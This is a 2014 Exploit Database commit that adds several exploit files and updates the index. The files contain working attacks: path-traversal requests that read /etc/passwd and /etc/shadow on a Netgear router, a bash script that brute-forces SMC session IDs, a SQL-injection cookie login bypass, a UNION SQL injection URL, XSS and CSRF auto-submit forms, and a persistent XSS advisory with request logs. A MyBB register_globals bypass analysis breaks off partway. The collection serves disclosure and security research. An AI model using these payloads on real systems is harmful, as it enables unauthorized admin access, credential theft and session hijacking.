Updated 11_23_2014

This commit is contained in:
Offensive Security 2014-11-23 04:46:32 +00:00
parent ba4b116f27
commit 4283820381
13 changed files with 885 additions and 1 deletions

View file

@ -26857,7 +26857,7 @@ id,file,description,date,author,platform,type,port
29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 - Multiple Cross Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0
29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection Vulnerability",2007-04-30,ertuqrul,asp,webapps,0
29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 (.zip) - Crash PoC",2013-11-30,KAI,windows,dos,0
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution Using Admin Privileges",2013-11-30,BlackDream,php,webapps,0
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0
29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
29938,platforms/php/webapps/29938.txt,"E-Annu Home.PHP SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0
29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 XRender Extension Divide by Zero Denial of Service Vulnerability",2007-05-01,"Derek Abdine",linux,dos,0
@ -31766,6 +31766,7 @@ id,file,description,date,author,platform,type,port
35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0
35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
@ -31805,3 +31806,14 @@ id,file,description,date,author,platform,type,port
35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0
35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0
35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0
35314,platforms/linux/remote/35314.txt,"Wireshark <= 1.4.3 - '.pcap' File Memory Corruption Vulnerability",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0
35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 'custid' Parameter SQL Injection Vulnerability",2011-02-07,NoNameMT,php,webapps,0
35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass Vulnerability",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0
35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0
35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 'dagc.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-02-07,d3c0der,windows,remote,0
35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35321,platforms/php/webapps/35321.txt,"Supr Shopsystem 5.1.0 - Persistent UI Vulnerability",2014-11-22,Vulnerability-Lab,php,webapps,0
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/46224/info
Multiple Check Point endpoint security products are prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to harvest sensitive information that may lead to further attacks.
http://www.example.com/conf/ssl/apache/integrity-smartcenter.cert
http://www.example.com/conf/ssl/apache/integrity-smartcenter.key
http://www.example.com/conf/ssl/apache/integrity.cert
http://www.example.com/conf/ssl/apache/integrity.key
http://www.example.com/conf/ssl/apache/smartcenter.cert
http://www.example.com/conf/ssl/integrity-keystore.jks
http://www.example.com/conf/ssl/isskeys.jks
http://www.example.com/conf/ssl/openssl.pem
http://www.example.com/conf/integrity.xml
http://www.example.com/conf/jaas/users.xml
http://www.example.com/bin/DBSeed.xml
http://www.example.com:8080/conf/ssl/apache/integrity-smartcenter.cert

View file

@ -0,0 +1,86 @@
Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit
Vendor: NETGEAR
Product web page: http://www.netgear.com
Affected version: WNR500 (firmware: 1.0.7.2)
Summary: The NETGEAR compact N150 classic wireless router (WNR500) improves
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home.
Desc: The router suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is
not properly verified before being used to include files. This can be exploited
to include files from local resources with directory traversal attacks.
Tested on: mini_httpd/1.19 19dec2003
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5208
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php
16.11.2014
--
= 1 =============================================================
GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
---
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
= 2 =============================================================
GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
---
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/46167/info
Wireshark is prone to a memory-corruption vulnerability because it fails to properly handle certain files.
Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application.
http://www.exploit-db.com/sploits/35314.pcap

View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/46178/info
The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability.
An attacker can exploit this issue to gain unauthorized administrative access to the affected devices.
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done

26
platforms/php/webapps/35271.txt Executable file
View file

@ -0,0 +1,26 @@
# Title : Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Date : 17.11.2014
# Demo : http://www.era.sn/courrier
# Download : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
you first go here:
http://www.target.com/path/index.php?page=welcome.php
you will go login.php, but if we change our cookie's with this exploit we will be login admin panel.
exploit:
javascript:document.cookie = "UserId=[username] ' or '; path=/";
or you edit your cookie's with "Cookies Manager"
name = maarch
contents = UserId=username ' or '
host = your target
path = /script_path/
and dont change other options its keep default.

10
platforms/php/webapps/35315.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/46171/info
Escortservice is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Escortservice 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+

10
platforms/php/webapps/35319.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/46250/info
WebAsyst Shop-Script is prone to a cross-site-scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
http://www.example.com/html/scripts/index.php?>[xss]
http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export=

46
platforms/php/webapps/35320.txt Executable file
View file

@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/46256/info
ViArt Shop is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ViArt Shop 4.0.5 is vulnerable; other versions may also be affected.
1. http://www.example.com/admin/admin_product.php?category_id=0&item_id=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
2. <form action="http://www.example.com/admin/admin_global_settings.php" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="rp" value="admin.php">
<input type="hidden" name="tab" value="general">
<input type="hidden" name="site_name" value="Default Site">
<input type="hidden" name="site_url" value="http://host/">
<input type="hidden" name="admin_email" value="email@example.com">
<input type="hidden" name="layout_id" value="1">
<input type="hidden" name="password_encrypt" value="0">
<input type="hidden" name="admin_password_encrypt" value="0">
<input type="hidden" name="html_below_footer" value=&#039;12345"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="operation" value="save">
</form>
<script>
document.main.submit();
</script>
3. <form action="http://www.example.com/admin/admin_manufacturer.php" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="manufacturer_id" value="3">
<input type="hidden" name="manufacturer_name" value=&#039;Company"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="manufacturer_order" value="1">
<input type="hidden" name="friendly_url" value="">
<input type="hidden" name="affiliate_code" value="">
<input type="hidden" name="short_description" value="">
<input type="hidden" name="full_description" value="">
<input type="hidden" name="image_small" value="images/manufacturers/small/company.gif">
<input type="hidden" name="image_small_alt" value="company">
<input type="hidden" name="image_large" value="images/manufacturers/large/company.gif">
<input type="hidden" name="image_large_alt" value="company">
</form>
<script>
document.main.submit();
</script>

260
platforms/php/webapps/35321.txt Executable file
View file

@ -0,0 +1,260 @@
Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
Release Date:
=============
2014-11-07
Vulnerability Laboratory ID (VL-ID):
====================================
1353
Common Vulnerability Scoring System:
====================================
3.1
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store.
Without installation and own webspace you can begin to create products and content right after the registration. With our
free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an
expert to work with the SUPR Shop.
( Copy of the Vendor Homepage: http://de.supr.com/tour )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
Vulnerability Disclosure Timeline:
==================================
2014-11-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Supreme NewMedia GmbH
Product: Supr - Shopsystem Web Application 5.1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
The vulnerability can be exploited by remote attackers to execute persistent codes with forced client-side browser requests through a non
expired session or by local post inject.
The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link).
Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail
POST method request. The execution of the code occurs above to the error exception-handling that should prevent but got evaded.
The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Dashboard > Settings > General > (setting_shopdetail)
Vulnerable Parameter(s):
[+] blogname
[+] blog/shop slogan
[+] tags
Affected Module(s):
[+] Dashboard (localhost:80/a/wp-admin/[x])
Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Dashboard > Settings > General > (setting_shopdetail)
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
<div class="form-row field-error">
<div class="label">
<label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
</div>
<div class="field">
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
<!-- <pre></pre> -->
<ul class="">
<li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
</ul></div>
Note: The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
__utmb=182188197.24.10.1414786850]
Connection[keep-alive]
Cache-Control[max-age=0]
POST-Daten:
setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
shopreg%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshopcategory%5D[]
setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bemailfooter%5D[]
setting_shopdata%5Binvoicenote%5D[]
setting_shopdata%5Bshop_google_analytics_account%5D[]
setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
setting_shopdata%5Bsubmit%5D[save]
Response Header:
Date[Fri, 31 Oct 2014 20:25:22 GMT]
Server[Apache/2.2.16 (Debian)]
X-Powered-By[PHP/5.3.3-7+squeeze22]
p3p[CP="CAO PSA OUR"]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Connection[close]
Content-Type[text/html; charset=UTF-8]
--
Status: 200[OK]
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!]
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[283] Mime Type[text/html]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Date[Fri, 31 Oct 2014 20:25:24 GMT]
Server[Apache/2.2.16 (Debian)]
Content-Length[283]
Keep-Alive[timeout=5, max=8]
Connection[Keep-Alive]
Content-Type[text/html; charset=iso-8859-1]
Reference(s):
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable setting_shopdetail values in the input POST method request.
Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
Setup the error exception above to the input mask and reconfigure it to capture the events correctly.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

304
platforms/php/webapps/35323.md Executable file
View file

@ -0,0 +1,304 @@
# Exploit Title: MyBB <= 1.8.2 unset_globals() Function Bypass and Remote
Code Execution Vulnerability
# Date: 2014-11-21
# Exploit Author: Taoguang Chen
# Vendor Homepage: twitter.com/chtg57
# Software Link: www.mybb.com
# Version: MyBB 1.8 <= 1.8.2 and MyBB 1.6 <= 1.6.15
MyBB had released 1.8.3 and 1.6.16 to fixed this vulnerability.
Advisory: https://gist.github.com/chtg/e9824db42a8edf302b0e
#MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution Vulnerability
Taoguang Chen <[@chtg](http://github.com/chtg)> - 2014.03.06
> MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution.
##I. MyBB's unset_globals() Function Bypass
When PHP's register\_globals configuration set on, MyBB will call unset\_globals() function, all global variables registered by PHP from $\_POST, $\_GET, $\_FILES, and $\_COOKIE arrays will be destroyed.
```
if(@ini_get("register_globals") == 1)
{
$this->unset_globals($_POST);
$this->unset_globals($_GET);
$this->unset_globals($_FILES);
$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
if(!is_array($array))
{
return;
}
foreach(array_keys($array) as $key)
{
unset($GLOBALS[$key]);
unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
}
}
```
But unset\_globals() function can be bypassed.
###i) $\_GET, $\_FILES, or $\_COOKIE Array was Destroyed
```
foo.php?_COOKIE=1
// $_GET['_COOKIE']
```
When $_GET['\_COOKIE']=1 is sent, unset\_globals() will destroy $GLOBALS['\_COOKIE'].
```
$this->unset_globals($_GET);
...
}
...
function unset_globals($array)
{
...
foreach(array_keys($array) as $key)
{
unset($GLOBALS[$key]);
```
This means $\_COOKIE array will be destroyed. This also means all global variables registered by PHP from $\_COOKIE array will be destroyed because them will not be handled by unset().
```
$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
if(!is_array($array))
{
return;
}
```
By the same token, if $\_GET or $\_FILES array was destroyed via unset\_globals(), the corresponding global variables registered by PHP will not be destroyed.
###ii) $GLOBALS Array was Destroyed
```
foo.php?GLOBALS=1
// $_GET['GLOBALS']
```
When $\_GET['GLOBALS']=1 is sent, unset\_globals() will destroy $GLOBALS['GLOBALS']. This means $GLOBALS array will be destroyed.
$GLOBALS array is a automatic global variable, and binding with global symbol table, you can use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script. This means that the binding between the $GLOBALS array and the global symbol table will be broken because $GLOBALS array has been destroyed. This also means all variables registered by PHP from $\_GET, $\_FILES and $\_COOKIE arrays will not be destroyed.
By the same token, when $\_POST['GLOBALS'], $\_FLIES['GLOBALS'], or $\_COOKIE['GLOBALS'] is sent, unset\_globals() will destroy $GLOBALS array, then the corresponding global variables registered by PHP will not be destroyed.
In fact, MyBB is already aware of the problem:
```
$protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
foreach($protected as $var)
{
if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
{
die("Hacking attempt");
}
}
```
Unfortunately, there is a small hole yet:-)
$\_REQUEST is an associative array that by default contains mix of $\_GET, $\_POST, and $\_COOKIE arrays data.
But PHP >= 5.3 introduced request\_order configuration, the directive affects the contents of $\_REQUEST array.
```
request_order = "GP"
```
This is recommended setting in php.ini. Set it to "GP" means only $\_GET and $\_POST arrays data is merged into $\_REQUEST array without $\_COOKIE array data.
So, it is possible that sent $\_COOKIE['GLOBALS'], then bypass unset\_globals() function in PHP 5.3.
##II. Remote Code Execution Vulnerability
There is one interesting method in MyBB:
```
class MyBB {
...
function __destruct()
{
// Run shutdown function
if(function_exists("run_shutdown"))
{
run_shutdown();
}
}
}
```
Look into run\_shutdown() function:
```
function run_shutdown()
{
global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
...
// Run any shutdown functions if we have them
if(is_array($shutdown_functions))
{
foreach($shutdown_functions as $function)
{
call_user_func_array($function['function'], $function['arguments']);
}
}
$done_shutdown = true;
}
```
The $shutdown\_functions was initialized via add\_shutdown() function in init.php:
```
// Set up any shutdown functions we need to run globally
add_shutdown('send_mail_queue');
```
